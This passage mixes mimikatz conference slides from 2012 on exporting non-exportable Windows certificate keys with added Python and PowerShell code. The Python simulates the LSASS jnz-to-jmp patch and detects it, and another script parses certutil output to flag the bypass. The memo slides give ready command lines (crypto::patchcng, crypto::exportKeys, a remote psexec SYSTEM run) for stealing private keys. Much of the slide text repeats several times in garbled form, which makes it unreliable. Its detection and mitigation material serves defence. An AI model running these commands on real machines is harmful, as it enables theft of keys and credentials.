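# test, the conditional jump from the slide, then the error path returning
# NTE_BAD_KEY_STATE (0x8009000B, the code certutil reports on the slide).
CLEAN_CODE = bytes.fromhex(
    "8b45fc"        # mov  eax, [ebp-4]                (constructed)
    "a801"          # test al, 1                       (constructed)
    "751c"          # jnz  short continue_key_export   <- from the slide
    "b80b000980"    # mov  eax, 0x8009000B             (constructed)
    "c9c3"          # leave ; ret                      (constructed)
)
CHECK_OFFSET = 5                          # where "75 1C" sits in CLEAN_CODE
SLIDE_ADDRESS = 0x6C815210                # .text address printed on the slide
CODE_BASE = SLIDE_ADDRESS - CHECK_OFFSET  # assumed base so the jnz lands there


def patch_jnz_to_jmp(code: bytes, offset: int) -> bytes:
    """What crypto::patchcng does inside LSASS: rewrite the conditional short
    jump at `offset` as an unconditional one.  The displacement byte is kept,
    so the jump still reaches continue_key_export; it just always does.
    Refuses to write over anything that is not a 'jnz short'."""
    if code[offset] != JNZ_SHORT:
        raise ValueError(f"expected 0x75 at +{offset:#x}, found {code[offset]:#04x}")
    patched = bytearray(code)
    patched[offset] = JMP_SHORT
    return bytes(patched)


def short_jump_target(base: int, offset: int, code: bytes) -> int:
    """Absolute target of the 2-byte short jump at `offset`: rel8 is signed
    and relative to the end of the instruction."""
    rel8 = int.from_bytes(code[offset + 1:offset + 2], "little", signed=True)
    return base + offset + 2 + rel8


def find_jnz_to_jmp_flips(clean: bytes, live: bytes) -> list[int]:
    """Detection side: compare the on-disk code bytes with the same range
    read from the running process and return the offsets where a 'jnz short'
    became a 'jmp short' with an identical displacement, i.e. this patch."""
    if len(clean) != len(live):
        raise ValueError("compare the same byte range of the same module")
    return [i for i in range(len(clean) - 1)
            if clean[i] == JNZ_SHORT and live[i] == JMP_SHORT
            and clean[i + 1] == live[i + 1]]


if __name__ == "__main__":
    live = patch_jnz_to_jmp(CLEAN_CODE, CHECK_OFFSET)
    before = short_jump_target(CODE_BASE, CHECK_OFFSET, CLEAN_CODE)
    after = short_jump_target(CODE_BASE, CHECK_OFFSET, live)
    print(f"jump target before/after patch: {before:#x} / {after:#x}")
    print("offsets flipped jnz->jmp:", find_jnz_to_jmp_flips(CLEAN_CODE, live))
```

The detector deliberately looks for this exact shape (0x75 to 0xEB, displacement preserved) rather than for any byte difference, because relocations and hot-patching legitimately change other bytes; in practice you would run it over the `.text` range of the KeyIso code read from LSASS against the file on disk, and the bonus slide's point applies: the flip survives until the KeyIso service restarts or the machine reboots.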
mimikatz crypto patchcng: demo time
Import, export, import as not exportable… export again.
mimikatz crypto patchcng: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC certificates snap-in cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz crypto patchcng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export work too
– yeah, like the good old certutil
certutil before the patch (the key is flagged non-exportable and the export is refused):
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

certutil after crypto::patchcng (same command, same key):
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
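certutil's output is easy to script over, which is what makes the before/after above usable as a check rather than just a demo. The Python below is an added example, not from the talk: it parses a run like the one above into the fields that matter for an inventory (key container, provider, whether certutil reported the key as non-exportable, and the HRESULT of the export attempt; 0x8009000B is NTE_BAD_KEY_STATE, the error on the slide), and then flags the slide's situation, a key that was non-exportable in a baseline run being exported successfully later. The two transcripts are constructed from the slide's French output re-worded as English-locale certutil strings; the exact English wording is an assumption, as is the provider-name heuristic used to tell software-stored keys from smartcard/TPM-backed ones.

```python
"""
Added example (not from the talk): parse certutil -exportPFX transcripts
into inventory records and flag an export that contradicts the key's own
export policy.  Sample transcripts are constructed from the slide; the
English certutil wording is assumed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

NTE_BAD_KEY_STATE = 0x8009000B   # "Key not valid for use in specified state."

# Constructed sample: the failing run before the patch (from the slide).
BEFORE_PATCH = """\
C:\\Users\\Gentil Kiwi\\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
"""

# Constructed sample: the same command after crypto::patchcng (from the slide).
AFTER_PATCH = """\
C:\\Users\\Gentil Kiwi\\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
"""

CERT_HDR   = re.compile(r"^=+ Certificate (\d+) =+$")
SHA1       = re.compile(r"^Cert Hash\(sha1\): (.+)$")
CONTAINER  = re.compile(r"^\s*Key Container = (.+)$")
PROVIDER   = re.compile(r"^\s*Provider = (.+)$")
NOT_EXPORT = re.compile(r"^Private key is NOT exportable", re.IGNORECASE)
FAILED     = re.compile(r"^CertUtil: -(\w+) command FAILED: (0x[0-9A-Fa-f]+)")
SUCCEEDED  = re.compile(r"^CertUtil: -(\w+) command completed successfully")


@dataclass
class CertRecord:
    index: int
    sha1: str = ""
    container: str = ""
    provider: str = ""
    marked_non_exportable: bool = False   # certutil printed the NOT line


@dataclass
class CertutilRun:
    certs: list[CertRecord] = field(default_factory=list)
    command: str = ""          # e.g. "exportPFX"
    ok: bool = False
    error: int | None = None   # HRESULT from the FAILED line, if any


def parse_certutil_run(text: str) -> CertutilRun:
    """Walk a certutil transcript line by line; collect per-certificate key
    container, provider and export policy, plus the final command status."""
    run = CertutilRun()
    cur: CertRecord | None = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if m := CERT_HDR.match(line):
            cur = CertRecord(index=int(m.group(1)))
            run.certs.append(cur)
        elif m := FAILED.match(line):
            run.command, run.ok, run.error = m.group(1), False, int(m.group(2), 16)
        elif m := SUCCEEDED.match(line):
            run.command, run.ok, run.error = m.group(1), True, None
        elif cur is None:
            continue                      # prompt, store name, banner lines
        elif m := SHA1.match(line):
            cur.sha1 = m.group(1).replace(" ", "").lower()
        elif m := CONTAINER.match(line):
            cur.container = m.group(1).strip()
        elif m := PROVIDER.match(line):
            cur.provider = m.group(1).strip()
        elif NOT_EXPORT.match(line):
            cur.marked_non_exportable = True
    return run


def software_backed(run: CertutilRun) -> list[CertRecord]:
    """Keys held by a Microsoft software CSP/KSP are what the LSASS patch
    reaches; smartcard and TPM (Platform Crypto) providers are not.
    Matching on the provider name is a heuristic (assumption)."""
    return [c for c in run.certs
            if c.provider.startswith("Microsoft")
            and "Smart Card" not in c.provider
            and "Platform Crypto" not in c.provider]


def policy_bypassed(before: CertutilRun, after: CertutilRun) -> bool:
    """True when a key that reported itself non-exportable in the baseline
    run was exported successfully later: the slide's before/after as a check."""
    baseline = {c.container for c in before.certs if c.marked_non_exportable}
    return after.ok and any(c.container in baseline for c in after.certs)
```

Note that on the slide's second run certutil no longer prints the non-exportable line at all, so the success line alone is not the signal; the check has to compare against a baseline inventory taken before the export, keyed by container name. The `software_backed` filter is the practical takeaway of the "what we can do" slide: keys whose provider is a smartcard or TPM provider do not show up in the list the patch can reach.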
mimikatz crypto: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
• So yes, mimikatz can export it
mimikatz crypto: what can we do?
Exactly the same as for sekurlsa: it all comes down to preventing access to the accounts / the computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
AppLocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List notifications (process, thread, image, registry)
– List object hooks and procedures
– …
…
mimikatz: that's all folks
Thanks to
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
• Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz :: crypto :: memo

Some commands
  mimikatz crypto::patchcapi crypto::exportCertificates exit
  psexec \\windows -s -c C:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
  mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
- the exported PFX files are protected with the password: mimikatz

Keys
- when you import the same certificate several times, exportable or not, Windows creates a new key container each time (duplicate keys)
- when you delete a certificate, Windows does not delete its private key... funny, isn't it?
  - so yes, mimikatz can still export it: crypto::exportKeys walks the key containers, not the certificate stores
mimikatz :: crypto :: what we can do

Exactly the same as for sekurlsa: the protection is to prevent access to the accounts and to the computer (no admin, no admin, no admin...)
- the "not exportable" flag is not a boundary against a local administrator; only keys that never sit in LSASS memory stay out of reach
Basics
- use smart cards / tokens for user certificates
- use Hardware Security Modules (HSM), even SoftHSM
More in depth
- see what Microsoft can do with the TPM from Windows 8
  - Virtual Smart Card seems promising
- verify the vendors' implementations (Lenovo, Dell, ...) of TPM CSP/KSP
  - their biometrics stuff was a little buggy ;)
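The memo above says deleted and re-imported certificates leave private keys behind, and this slide says the real fix is to keep keys in hardware rather than to rely on the exportable flag. The following PowerShell script is an added example, not code from the slides or from mimikatz: it inventories the private keys behind the certificates of one store location, reports for each the API (CAPI or CNG), the provider holding it and whether it is flagged exportable, then lists key files on disk that no certificate in that location references, the orphaned containers that crypto::exportKeys would still reach. Assumptions: Windows PowerShell 5.1; the on-disk key paths are Microsoft's documented locations for software CSP/KSP containers; the list of software provider names is only a labelling heuristic; reading LocalMachine key details needs an elevated prompt.

```powershell
# Added example (not from the slides / mimikatz): private-key inventory and orphan-key check.
# Usage: .\Get-KeyInventory.ps1 -Location LocalMachine   (run elevated for LocalMachine)
param(
    [ValidateSet('CurrentUser', 'LocalMachine')]
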